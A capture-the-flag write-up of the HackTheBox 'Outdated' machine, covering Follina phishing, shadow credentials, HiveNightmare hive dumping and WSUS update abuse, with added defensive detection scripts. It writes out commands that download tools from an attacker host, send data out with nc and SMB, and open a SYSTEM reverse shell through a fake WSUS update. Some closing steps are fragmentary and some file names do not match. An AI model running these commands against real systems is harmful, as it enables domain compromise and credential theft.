HTB-OUTDATED
Summary
This machine was initially published with some unintended ways to root (e.g. Zerologon), which were later patched. The intended privilege-escalation path is via WSUS.
This machine features several fairly new exploits such as Follina and WSUS abuse. In general it’s also a bit unstable, so exploit with patience.
Scanning
Enum
From the above, the target looks like another exercise on AD, LDAP and Kerberos. Let’s find some more info.
> enum4linux outdated.htb
Domain Name: OUTDATED
Domain Sid: S-1-5-21-4089647348-67660539-4016542185
> smbclient -N -L outdated.htb
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
Shares Disk
SYSVOL Disk Logon server share
UpdateServicesPackages Disk A network share to be used by client systems for collecting all software packages (usually applications) published on this WSUS system.
WsusContent Disk A network share to be used by Local Publishing to place published content on this WSUS system.
WSUSTemp Disk A network share used by Local Publishing from a Remote WSUS Console Instance.
There is a non-default share named Shares. Connecting to it, we can find more info.
> smbclient -N \\\\outdated.htb\\Shares
smb: \> ls
. D 0 Mon Jun 20 11:01:33 2022
.. D 0 Mon Jun 20 11:01:33 2022
NOC_Reminder.pdf AR 106977 Mon Jun 20 11:00:32 2022
9116415 blocks of size 4096. 1440211 blocks available
smb: \> get NOC_Reminder.pdf
getting file \NOC_Reminder.pdf of size 106977 as NOC_Reminder.pdf (33.8 KiloBytes/sec) (average 33.8 KiloBytes/sec)
User: btables
We found a document, NOC_Reminder.pdf. Reading it, we learn that there are unpatched vulnerabilities on the network, and that itsupport@outdated.htb is a valid mailbox whose owner checks emails for links regularly.
One of the unpatched vulnerabilities listed there is exploitable via email: CVE-2022-30190.
CVE-2022-30190 is also known as Follina, a relatively recent vulnerability in MS Word/RTF document handling: a rarely used component, the Microsoft Support Diagnostic Tool (MSDT), can be made to download and run a malicious script via an embedded link. For more detail, check here: https://logrhythm.com/blog/detecting-follina-cve-2022-30190-microsoft-office-zero-day-exploit/
To exploit this, I used this PoC: https://github.com/JohnHammond/msdt-follina
Generate Payload
Use some code based on John Hammond’s PoC. The PoC does a lot of things: it generates a Word document that will request the HTML payload, serves it, and even catches the reverse shell. I’ll use just the couple of lines that generate the HTML payload.
It’s important to note that the payload must be padded out to more than 4096 bytes, or it won’t trigger.
I’ll generate this payload and save it into a file that I’ll then serve with Python’s web server.
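As an added example (not part of this writeup or of the PoC linked above), here is a small Python checker for the defensive side of the same technique. It inspects a .docx for the two traits a Follina document carries: an OLE relationship whose target is an external http(s) URL, and any reference to the ms-msdt: handler. The sample documents are constructed inline, and attacker.example is a placeholder host.

```python
import io
import re
import zipfile
import xml.etree.ElementTree as ET

# Real OOXML identifiers: the relationships namespace and the type Word uses for OLE objects.
RELS_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
OLE_REL_TYPE = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject"
# The MSDT protocol handler scheme that Follina abuses.
MSDT_RE = re.compile(rb"ms-msdt:", re.IGNORECASE)


def inspect_docx(data: bytes) -> list:
    """Return human-readable findings for a .docx given as bytes; an empty list means nothing suspicious."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        for name in z.namelist():
            content = z.read(name)
            # Finding 1: any part that references the ms-msdt: handler directly.
            if MSDT_RE.search(content):
                findings.append(f"{name}: references the ms-msdt: protocol handler")
            # Finding 2: relationship parts declaring an OLE object fetched from a remote URL.
            if not name.endswith(".rels"):
                continue
            try:
                root = ET.fromstring(content)
            except ET.ParseError:
                findings.append(f"{name}: relationships XML does not parse")
                continue
            for rel in root.iter(f"{{{RELS_NS}}}Relationship"):
                if rel.get("Type") != OLE_REL_TYPE:
                    continue
                target = rel.get("Target", "")
                if rel.get("TargetMode") == "External" and target.lower().startswith(("http://", "https://")):
                    findings.append(f"{name}: OLE object loaded from external URL {target}")
    return findings


def build_docx(extra_rels: str = "") -> bytes:
    """Build a minimal .docx in memory (constructed test data); extra_rels is spliced into document.xml.rels."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml",
                   '<?xml version="1.0"?><Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"/>')
        z.writestr("word/document.xml",
                   '<?xml version="1.0"?><w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main"><w:body/></w:document>')
        z.writestr("word/_rels/document.xml.rels",
                   f'<?xml version="1.0"?><Relationships xmlns="{RELS_NS}">{extra_rels}</Relationships>')
    return buf.getvalue()


# Constructed samples: a clean document, and one with the relationship shape a Follina document carries
# (external OLE target on a placeholder host; no payload HTML is involved).
BENIGN_DOCX = build_docx()
SUSPICIOUS_DOCX = build_docx(
    f'<Relationship Id="rId999" Type="{OLE_REL_TYPE}" Target="http://attacker.example/msdt.html" TargetMode="External"/>'
)

if __name__ == "__main__":
    for label, doc in (("benign", BENIGN_DOCX), ("suspicious", SUSPICIOUS_DOCX)):
        print(label, inspect_docx(doc) or ["clean"])
```

A legitimate document can embed an external OLE link, so treat a hit as a triage signal rather than a verdict; the ms-msdt: match is the stronger indicator, since that handler has no business being referenced from a document at all.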
Trigger Exploit
I’ll send the link in an email to itsupport@outdated.htb using swaks.
If this works, the user will click the link, requesting the msdt.html page, which I’ll serve, and moments later I should get a request for nc64.exe (I’ll make sure there’s a copy in my web root) and then a shell on TCP 443. It works just as expected: two GET requests, then a shell.
User: sflowers
Now we can collect AD information as btables, who is a domain user.
Upload SharpHound.exe to the machine and start collecting domain info.
# download SharpHound to the target
> certutil -urlcache -f http://10.10.14.10:8000/SharpHound.exe SharpHound.exe
# run SharpHound
> SharpHound.exe -c All
# send the result back: listen on the attack box first
> nc -nlvp 5555 > output.zip
# then push the file from the target
> nc64.exe 10.10.14.10 5555 < 20241218170837_BloodHound.zip
Or, alternatively, serve an SMB share from the attack box:
# impacket-smbserver -smb2support share . -user puck -pass puckpuck
and on the client:
c:\temp>net use \\10.10.14.10\share /u:puck puckpuck
The command completed successfully.
c:\temp>copy 20241218170837_BloodHound.zip \\10.10.14.10\share\
1 file(s) copied.
Analysing the output in BloodHound shows that btables belongs to the group ITSTAFF, and ITSTAFF has the AddKeyCredentialLink privilege over the user sflowers, who has PSRemote access to the DC. BloodHound’s description of the edge:
The members of the group ITSTAFF@OUTDATED.HTB have the ability to write to the “msds-KeyCredentialLink” property on SFLOWERS@OUTDATED.HTB. Writing to this property allows an attacker to create “Shadow Credentials” on the object and authenticate as the principal using kerberos PKINIT.
To abuse this privilege, use Whisker.
You may need to authenticate to the Domain Controller as a member of ITSTAFF@OUTDATED.HTB if you are not running a process as a member
Whisker.exe add /target:<TargetPrincipal>
Alternatively, abuse this privilege with pyWhisker:
pywhisker.py -d "domain.local" -u "controlledAccount" -p "somepassword" --target "targetAccount" --action "add"
To get the user sflowers, we need to use a technique called Shadow Credentials; for more detail, refer to this: https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/shadow-credentials
Basically, we can write a new key credential into the msDS-KeyCredentialLink attribute of the user sflowers. That key credential is accepted as a valid credential for sflowers, so we can use the matching certificate to request a TGT for sflowers via PKINIT, which gives us persistent access as sflowers.
To do so, we need some compiled Windows tooling, which can be downloaded from here: https://github.com/r3motecontrol/Ghostpack-CompiledBinaries
Note that Whisker needs to be compiled yourself or taken from here: https://github.com/S3cur3Th1sSh1t/PowerSharpPack/tree/master/PowerSharpBinaries
# upload binaries
> certutil.exe -urlcache -f http://10.10.14.10:8000/Whisker.exe Whisker.exe
> certutil.exe -urlcache -f http://10.10.14.10:8000/Rubeus.exe Rubeus.exe
# run Whisker to add a new key credential to sflowers
> Whisker.exe add /target:sflowers
At the end of its output, Whisker prints the Rubeus command to request a TGT for sflowers with the new certificate (the certificate password is generated randomly on each run):
> Rubeus.exe asktgt /user:sflowers /certificate:<base64-cert> /password:"el84kTr1afLpoMWG" /domain:outdated.htb /dc:DC.outdated.htb /getcredentials /show
Running that command outputs the ticket and, thanks to /getcredentials, the line
NTLM : 1FCDB1F6015DCB318CC77BB2BDA14DB5
This can be used as the NTLM hash for the user sflowers.
Now we can PSRemote into the target as sflowers using the NTLM hash we obtained via the shadow credential:
> evil-winrm -i outdated.htb -u sflowers -H 1FCDB1F6015DCB318CC77BB2BDA14DB5
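As an added example (not from this writeup), here is a Python detection for the shadow-credential write shown above. It works over Windows Security event 5136 (directory service object modified), which records a write to msDS-KeyCredentialLink with OperationType %%14674 (value added). The event records are constructed inline as JSON, and DEVICEREG_SVC is a hypothetical allowlisted account. Caveat: 5136 is only generated when "Audit Directory Service Changes" is enabled and the user objects carry a SACL that covers attribute writes.

```python
import json

# Hypothetical allowlist: service accounts expected to write key credentials (e.g. a device-registration service).
ALLOWED_WRITERS = {"DEVICEREG_SVC"}
VALUE_ADDED = "%%14674"   # OperationType code Windows uses in event 5136 for "Value Added"
KEYCRED_ATTR = "msds-keycredentiallink"

# Constructed sample events, shaped like event 5136 (Directory Service Changes) exported to JSON.
SAMPLE_EVENTS = json.dumps([
    {"EventID": 5136, "SubjectUserName": "btables", "ObjectDN": "CN=sflowers,CN=Users,DC=outdated,DC=htb",
     "AttributeLDAPDisplayName": "msDS-KeyCredentialLink", "OperationType": "%%14674"},
    {"EventID": 5136, "SubjectUserName": "DC$", "ObjectDN": "CN=DC,OU=Domain Controllers,DC=outdated,DC=htb",
     "AttributeLDAPDisplayName": "msDS-KeyCredentialLink", "OperationType": "%%14674"},
    {"EventID": 5136, "SubjectUserName": "btables", "ObjectDN": "CN=sflowers,CN=Users,DC=outdated,DC=htb",
     "AttributeLDAPDisplayName": "description", "OperationType": "%%14674"},
    {"EventID": 4624, "SubjectUserName": "sflowers", "ObjectDN": "", "AttributeLDAPDisplayName": "",
     "OperationType": ""},
])


def first_rdn_value(dn: str) -> str:
    """Return the value of the leading RDN of a DN, e.g. 'sflowers' for 'CN=sflowers,CN=Users,...'."""
    first = dn.split(",", 1)[0]
    return first.split("=", 1)[1] if "=" in first else first


def is_self_write(subject: str, object_dn: str) -> bool:
    """A computer account writing its own object (device registration, Windows Hello) is expected behaviour."""
    return subject.endswith("$") and subject[:-1].lower() == first_rdn_value(object_dn).lower()


def detect_shadow_credentials(events_json: str, allowed=ALLOWED_WRITERS) -> list:
    """One alert per msDS-KeyCredentialLink value added by a principal that is neither the object itself nor allowlisted."""
    alerts = []
    for ev in json.loads(events_json):
        if ev.get("EventID") != 5136:
            continue
        if ev.get("AttributeLDAPDisplayName", "").lower() != KEYCRED_ATTR:
            continue
        if ev.get("OperationType") != VALUE_ADDED:
            continue
        subject, target = ev.get("SubjectUserName", ""), ev.get("ObjectDN", "")
        if is_self_write(subject, target) or subject.upper() in allowed:
            continue
        alerts.append(f"{subject} added a key credential to {target}")
    return alerts


if __name__ == "__main__":
    for line in detect_shadow_credentials(SAMPLE_EVENTS):
        print("ALERT:", line)
```

The self-write exemption is what keeps this rule quiet in an environment with Windows Hello for Business or hybrid device join; a user account (rather than a computer account) adding a key credential to a different principal is the pattern worth paging on.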
PE: WSUS
Performing enumeration with winPEAS, we find that a WSUS server is configured over plain HTTP:
[+] Checking WSUS
[?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#wsus
WSUS is using http: http://wsus.outdated.htb:8530
[i] You can test https://github.com/pimps/wsuxploit to escalate privileges
But UseWUServer is equals to , so it may work or not
We continue by checking several registry values. With a non-HTTPS WSUS server and a UseWUServer value of 1, the machine is vulnerable to a WSUS attack: the client accepts updates from an endpoint it cannot authenticate.
The most recent write-up on this is the SharpWSUS post, which gives a really nice overview of how WSUS servers provide updates to networks of different size and complexity. It also links to a GitHub repo with the tool, which I’ll build in Visual Studio just like Whisker above, and upload to the DC:
*Evil-WinRM* PS C:\programdata> upload SharpWSUS.exe sw.exe
Info: Uploading SharpWSUS.exe to sw.exe
Data: 65536 bytes of 65536 bytes copied
Info: Upload successful!
Identify WSUS
The registry key HKLM:\software\policies\microsoft\windows\WindowsUpdate will show the WSUS server in use. From the client:
PS C:\> Get-ItemProperty HKLM:\software\policies\microsoft\windows\WindowsUpdate
And from the DC:
*Evil-WinRM* PS C:\> get-itemproperty HKLM:\software\policies\microsoft\windows\WindowsUpdate
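The following Python is an added example, not part of the writeup or of winPEAS: it parses reg query output for the WindowsUpdate policy key and its AU subkey and applies the same test winPEAS used (an http:// WUServer together with UseWUServer = 1). The sample output is constructed, using the server URL seen on this box; the HTTPS variant is what a correctly configured client would show.

```python
import re
from urllib.parse import urlsplit

# Constructed: what `reg query` prints for the two policy keys, using the WSUS URL seen on this box.
SAMPLE_REG_HTTP = r"""
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate
    WUServer    REG_SZ    http://wsus.outdated.htb:8530
    WUStatusServer    REG_SZ    http://wsus.outdated.htb:8530

HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU
    UseWUServer    REG_DWORD    0x1
"""

# Constructed: the same client pointed at an HTTPS WSUS URL on the default TLS port.
SAMPLE_REG_HTTPS = SAMPLE_REG_HTTP.replace("http://", "https://").replace(":8530", ":8531")

# Matches one "Name    REG_TYPE    value" line; assumes value names without spaces.
VALUE_RE = re.compile(r"^\s*(\S+)\s+(REG_\w+)\s+(.*?)\s*$")


def parse_reg_query(text: str) -> dict:
    """Collect name -> value pairs from `reg query` output (DWORDs converted from hex to int)."""
    values = {}
    for line in text.splitlines():
        m = VALUE_RE.match(line)
        if not m:
            continue
        name, kind, raw = m.groups()
        values[name] = int(raw, 16) if kind == "REG_DWORD" else raw
    return values


def assess_wsus(text: str) -> dict:
    """Decide whether the WSUS client policy exposes the host to update injection from an unauthenticated server."""
    values = parse_reg_query(text)
    server = values.get("WUServer")
    use_wu = values.get("UseWUServer", 0)
    result = {"wu_server": server, "use_wu_server": use_wu, "vulnerable": False, "reason": ""}
    if not server:
        result["reason"] = "no WSUS server configured; client uses Microsoft Update"
    elif use_wu != 1:
        result["reason"] = "WUServer is set but UseWUServer is not 1, so the policy is not in effect"
    elif urlsplit(server).scheme.lower() == "http":
        result["vulnerable"] = True
        result["reason"] = f"client fetches updates over plain HTTP from {server}"
    else:
        result["reason"] = f"WSUS server {server} is reached over HTTPS"
    return result


if __name__ == "__main__":
    for label, sample in (("as found", SAMPLE_REG_HTTP), ("fixed", SAMPLE_REG_HTTPS)):
        print(label, assess_wsus(sample))
```

The fix on the server side is to enable TLS on the WSUS IIS site and repoint the policy at the https:// URL; this check is worth running fleet-wide because a single client left on the http:// URL is enough for the attack shown below.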
SharpWSUS.exe will do this as well:
*Evil-WinRM* PS C:\programdata> .\sw.exe locate
..snip..
[*] Action: Locate WSUS Server
WSUS Server: http://wsus.outdated.htb:8530
[*] Locate complete
From the client, ping will show that it’s the same host as the DC:
PS C:\> ping wsus.outdated.htb
Resolve-DNSName will also show this (if run from the DC it needs -Server to work):
*Evil-WinRM* PS C:\programdata> Resolve-DNSName -Name wsus.outdated.htb -Type A -Server 127.0.0.1
Name Type TTL Section NameHost
---- ---- --- ------- --------
wsus.outdated.htb CNAME 3600 Answer dc.outdated.htb
Name : dc.outdated.htb
QueryType : A
TTL : 3600
Section : Answer
IP4Address : 10.10.11.175
Name : dc.outdated.htb
QueryType : A
TTL : 3600
Section : Answer
IP4Address : 172.16.20.1
WSUS Information
SharpWSUS.exe will also give information about the clients using the WSUS:
*Evil-WinRM* PS C:\programdata> .\sw.exe inspect
____ _ __ ______ _ _ ____
/ ___|| |__ __ _ _ __ _ _\ \ / / ___|| | | / ___|
\___ \| '_ \ / _` | '__| '_ \ \ /\ / /\___ \| | | \___ \
___) | | | | (_| | | | |_) \ V V / ___) | |_| |___) |
|____/|_| |_|\__,_|_| | .__/ \_/\_/ |____/ \___/|____/
|_|
Phil Keeble @ Nettitude Red Team
[*] Action: Inspect WSUS Server
################# WSUS Server Enumeration via SQL ##################
ServerName, WSUSPortNumber, WSUSContentLocation
-----------------------------------------------
DC, 8530, c:\WSUS\WsusContent
####################### Computer Enumeration #######################
ComputerName, IPAddress, OSVersion, LastCheckInTime
---------------------------------------------------
dc.outdated.htb, 172.16.20.1, 10.0.17763.652, 7/22/2022 5:01:44 AM
####################### Downstream Server Enumeration #######################
ComputerName, OSVersion, LastCheckInTime
---------------------------------------------------
####################### Group Enumeration #######################
GroupName
---------------------------------------------------
All Computers
Downstream Servers
Unassigned Computers
[*] Inspect complete
It only shows the DC, but that’s where I want SYSTEM anyway.
Exploit
PsExec
WSUS will only run Microsoft-signed binaries. As I have no good way to get a Microsoft signing certificate, I’ll have to use something legitimate. The article suggests the Sysinternals tool PsExec. I’ll download Sysinternals, copy PsExec.exe to my web server, and upload it:
*Evil-WinRM* PS C:\programdata> upload PsExec64.exe \programdata\ps.exe
Info: Uploading PsExec64.exe to \programdata\ps.exe
Data: 685960 bytes of 685960 bytes copied
Info: Upload successful!
Create/Approve Update
I’ll create an update using SharpWSUS.exe. The blog post shows adding an administrator, but I’ll just go for a reverse shell using nc64.exe. The /args for PsExec are -accepteula so that it doesn’t pop a box and wait for a click, -s to run as SYSTEM, and -d to return immediately. The /title is arbitrary.
*Evil-WinRM* PS C:\programdata> .\sw.exe create /payload:"C:\programdata\ps.exe" /args:" -accepteula -s -d c:\programdata\nc64.exe -e cmd.exe 10.10.14.6 445" /title:"CVE-2022-30190"
[*] Action: Create Update
[*] Creating patch to use the following:
[*] Payload: ps.exe
[*] Payload Path: C:\programdata\ps.exe
[*] Arguments: -accepteula -s -d c:\programdata\nc64.exe -e cmd.exe 10.10.14.6 445
[*] Arguments (HTML Encoded): -accepteula -s -d c:\programdata\nc64.exe -e cmd.exe 10.10.14.6 445
################# WSUS Server Enumeration via SQL ##################
ServerName, WSUSPortNumber, WSUSContentLocation
-----------------------------------------------
DC, 8530, c:\WSUS\WsusContent
ImportUpdate
Update Revision ID: 44
PrepareXMLtoClient
InjectURL2Download
DeploymentRevision
PrepareBundle
PrepareBundle Revision ID: 45
PrepareXMLBundletoClient
DeploymentRevision
[*] Update created - When ready to deploy use the following command:
[*] SharpWSUS.exe approve /updateid:ea097920-0e17-4f9e-8045-0dfc5078a317 /computername:Target.FQDN /groupname:"Group Name"
[*] To check on the update status use the following command:
[*] SharpWSUS.exe check /updateid:ea097920-0e17-4f9e-8045-0dfc5078a317 /computername:Target.FQDN
[*] To delete the update use the following command:
[*] SharpWSUS.exe delete /updateid:ea097920-0e17-4f9e-8045-0dfc5078a317 /computername:Target.FQDN /groupname:"Group Name"
[*] Create complete
I need to approve that update, using the syntax given in the output (/groupname is arbitrary):
*Evil-WinRM* PS C:\programdata> .\sw.exe approve /updateid:ea097920-0e17-4f9e-8045-0dfc5078a317 /computername:dc.outdated.htb /groupname:"CriticalPatches"
[*] Action: Approve Update
Targeting dc.outdated.htb
TargetComputer, ComputerID, TargetID
------------------------------------
dc.outdated.htb, bd6d57d0-5e6f-4e74-a789-35c8955299e1, 1
Group Exists = False
Group Created: CriticalPatches
Added Computer To Group
Approved Update
[*] Approve complete
It takes about a minute for this to fire, and it fails occasionally. If it fails, I’ll try again, but eventually there’s a connection at nc:
Beyond Root – Skipped Steps
PyWhisker Background
With a shell in the Hyper-V container, I built an EXE version of Whisker. There’s also a Python version of the exploit, pywhisker. It does the same thing, but I’ll execute it from my attack station. The problem is that to run it I’ll need some creds for the domain. This wasn’t an issue with the EXE version, as it was running in the context of btables and used what Windows had cached for the user to authenticate. But to run it from my VM, I’ll need creds.
The author’s intended path for this box was to exploit HiveNightmare to get creds for btables, and then use those to run pywhisker. That wasn’t necessary, but I’ll still show it here.
HiveNightmare
Background
In July 2021, a researcher noticed that the permissions on the raw registry hive files were misconfigured starting in Windows 10 build 1809, which was first released to the public in October 2018. This got the designation CVE-2021-36934, as well as the names HiveNightmare and SeriousSAM.
icacls shows that the SAM file is readable by all users:
C:\>icacls C:\windows\system32\config\SAM
C:\windows\system32\config\SAM BUILTIN\Administrators:(I)(F)
NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Users:(I)(RX)
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(RX)
APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(I)(RX)
Successfully processed 1 files; Failed processing 0 files
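As an added example (not part of this writeup), here is a Python check that parses icacls output like the above and reports low-privileged principals holding read rights on a hive file. Both samples are constructed: the first mirrors the vulnerable ACL shown, the second is the ACL once it is restored to administrators and SYSTEM only. It assumes the queried file path contains no spaces.

```python
import re

SAM_PATH = r"C:\windows\system32\config\SAM"

# Constructed sample, modelled on the icacls output for the SAM hive shown above.
ICACLS_VULNERABLE = r"""C:\windows\system32\config\SAM BUILTIN\Administrators:(I)(F)
                               NT AUTHORITY\SYSTEM:(I)(F)
                               BUILTIN\Users:(I)(RX)
                               APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(RX)
                               APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(I)(RX)

Successfully processed 1 files; Failed processing 0 files
"""

# Constructed: the ACL after the hive permissions are restored to administrators and SYSTEM only.
ICACLS_FIXED = r"""C:\windows\system32\config\SAM BUILTIN\Administrators:(I)(F)
                               NT AUTHORITY\SYSTEM:(I)(F)

Successfully processed 1 files; Failed processing 0 files
"""

# One ACE per line: "<principal>:(flag)(flag)..."; the lazy principal stops at the colon followed by the rights.
ACE_RE = re.compile(r"^(?P<principal>.+?):(?P<perms>(?:\([^()]*\))+)$")
# Simple and generic rights that include read access; (I),(OI),(CI),(IO),(NP) are inheritance flags, not rights.
READ_RIGHTS = {"F", "M", "RX", "R", "GR", "RD"}
# Principals that every ordinary, non-administrative account falls under.
LOW_PRIV = ("BUILTIN\\Users", "Everyone", "NT AUTHORITY\\Authenticated Users", "NT AUTHORITY\\INTERACTIVE")


def parse_icacls(output: str, path: str) -> list:
    """Return (principal, rights) pairs from icacls output for one file."""
    aces = []
    for line in output.splitlines():
        line = line.strip()
        if line.startswith(path):          # the first ACE shares its line with the file path
            line = line[len(path):].strip()
        m = ACE_RE.match(line)
        if not m:
            continue
        rights = {t for group in re.findall(r"\(([^()]*)\)", m.group("perms")) for t in group.split(",")}
        aces.append((m.group("principal"), rights))
    return aces


def readable_by_low_priv(output: str, path: str = SAM_PATH) -> list:
    """Principals from LOW_PRIV that hold a read-capable right on the file; an empty list means the ACL is sane."""
    return [principal for principal, rights in parse_icacls(output, path)
            if principal in LOW_PRIV and rights & READ_RIGHTS]


if __name__ == "__main__":
    print("vulnerable:", readable_by_low_priv(ICACLS_VULNERABLE))
    print("fixed:     ", readable_by_low_priv(ICACLS_FIXED))
```

Run the same check against SECURITY and SYSTEM, and note that, as the writeup shows next, fixing the ACL on the live files is not enough on its own: existing volume shadow copies still carry the readable copies, so they need to be removed too.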
Get Hive Files
Interestingly, I still can’t just copy the files. But a tool like HiveNightmare from researcher GossiTheDog will pull them (from a volume shadow copy) for me. I’ll grab the compiled EXE from the release page.
I’ll upload it using wget and run it:
PS C:\ProgramData> wget 10.10.14.6/HiveNightmare.exe -outfile hn.exe
PS C:\ProgramData> ./hn
HiveNightmare v0.6 - dump registry hives as non-admin users
Specify maximum number of shadows to inspect with parameter if wanted, default is 15.
Running...
Newer file found: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SAM
Newer file found: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\Windows\System32\config\SAM
Success: SAM hive from 2022-08-02 written out to current working directory as SAM-2022-08-02
Newer file found: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SECURITY
Newer file found: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\Windows\System32\config\SECURITY
Success: SECURITY hive from 2022-08-02 written out to current working directory as SECURITY-2022-08-02
Newer file found: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM
Newer file found: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\Windows\System32\config\SYSTEM
Success: SYSTEM hive from 2022-08-02 written out to current working directory as SYSTEM-2022-08-02
Assuming no errors above, you should be able to find hive dump files in current working directory.
It does create copies of the hives in the current directory:
PS C:\ProgramData> ls
Directory: C:\ProgramData
Mode LastWriteTime Length Name
---- ------------- ------ ----
d---s- 6/15/2022 6:30 PM Microsoft
d----- 6/15/2022 9:24 AM Microsoft OneDrive
d----- 6/15/2022 9:40 AM Packages
d----- 8/1/2022 7:41 PM regid.1991-06.com.microsoft
d----- 12/7/2019 1:14 AM SoftwareDistribution
d----- 4/9/2021 6:54 AM ssh
d----- 6/15/2022 9:53 AM USOPrivate
d----- 12/7/2019 1:14 AM USOShared
-a---- 8/3/2022 2:10 PM 227328 hn.exe
-a---- 8/3/2022 2:08 PM 45272 nc64.exe
-a---- 8/3/2022 2:10 PM 65536 SAM-2022-08-02
-a---- 8/3/2022 2:10 PM 32768 SECURITY-2022-08-02
-a---- 8/3/2022 2:10 PM 11534336 SYSTEM-2022-08-02
Exfil
To exfil these, I’ll start an SMB server on my box (impacket-smbserver, as above), connect to it from Outdated, and then copy the files:
PS C:\ProgramData> net use \\10.10.14.10\share /u:puck 0puckpuck
The command completed successfully.
PS C:\ProgramData> copy *-12-14 \\10.10.14.10\share\
PS C:\ProgramData> copy *-13 \\10.10.14.10\share\
Dump Hashes
With access to these hives, secretsdump.py will return the hashes.
This also includes a plaintext “DefaultPassword” for an unknown user: “5myBPLPDKT3Bfq”. That suggests it’s probably a domain user, not a local user.
crackmapexec shows these creds are good for btables:
Remote Shadow Credentials
PyWhisker
With creds, I can try to run PyWhisker remotely. It fails: the LDAP bind is rejected because TLS is required. Adding --use-ldaps fixes it.
sflowers has no shadow credentials. I’ll add one:
PKINITtools
The PyWhisker output suggests using PKINITtools to get a TGT. I’ll do that.
For the last step, I’ll need to run the getnthash.py script. I had some issues on my system getting the Python dependencies to run, so I just created a virtual environment (python -m venv venv, then source venv/bin/activate) and installed the requirements again in there (pip install -r requirements.txt). Then it worked.
With that hash, I can get an Evil-WinRM session.
Get the hashes
add user
then secretsdump
That was Fun!